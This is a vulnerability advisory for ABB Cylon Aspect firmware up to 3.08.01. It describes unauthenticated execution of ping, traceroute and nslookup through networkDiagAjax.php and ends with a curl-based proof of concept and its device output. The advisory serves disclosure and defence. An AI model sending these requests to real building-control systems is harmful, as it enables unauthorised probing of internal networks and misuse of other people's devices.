ABB Cylon Aspect 3.08.01 (networkDiagAjax.php) Remote Network Utility Execution

<html><body><p>ABB Cylon Aspect 3.08.01 (networkDiagAjax.php) Remote Network Utility Execution


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: &lt;=3.08.01

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The vulnerability allows an unauthenticated attacker to perform network
operations such as ping, traceroute, or nslookup on arbitrary hosts or IPs by
sending a crafted GET request to networkDiagAjax.php. This could be exploited
to interact with or probe internal or external systems, leading to internal
information disclosure and misuse of network resources.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5844
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5844.php


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 


$ curl "http://192.168.73.31/networkDiagAjax.php?command=nslookup&amp;host=packetstormsecurity.org"
</p><div>Server:    8.8.8.8<br/>
Address 1: 8.8.8.8 dns.google<br/>
<br/>
Name:      packetstormsecurity.org<br/>
Address 1: 198.84.60.198 198-84-60-198.ash01.rokabear.com<br/>
</div>

$ curl "http://192.168.73.31/networkDiagAjax.php?command=ping&amp;host=1.1.1.1"
<div>PING 1.1.1.1 (1.1.1.1): 56 data bytes<br/>
64 bytes from 1.1.1.1: seq=0 ttl=53 time=61.176 ms<br/>
64 bytes from 1.1.1.1: seq=1 ttl=53 time=60.986 ms<br/>
64 bytes from 1.1.1.1: seq=2 ttl=53 time=100.660 ms<br/>
<br/>
--- 1.1.1.1 ping statistics ---<br/>
3 packets transmitted, 3 packets received, 0% packet loss<br/>
round-trip min/avg/max = 60.986/74.274/100.660 ms<br/>
</div>

$ curl "http://192.168.73.31/networkDiagAjax.php?command=traceroute&amp;host=127.0.0.1"
<div>traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 38 byte packets<br/>
 1  localhost.localdomain (127.0.0.1)  0.019 ms  0.010 ms  0.009 ms<br/>
</div>
</body></html>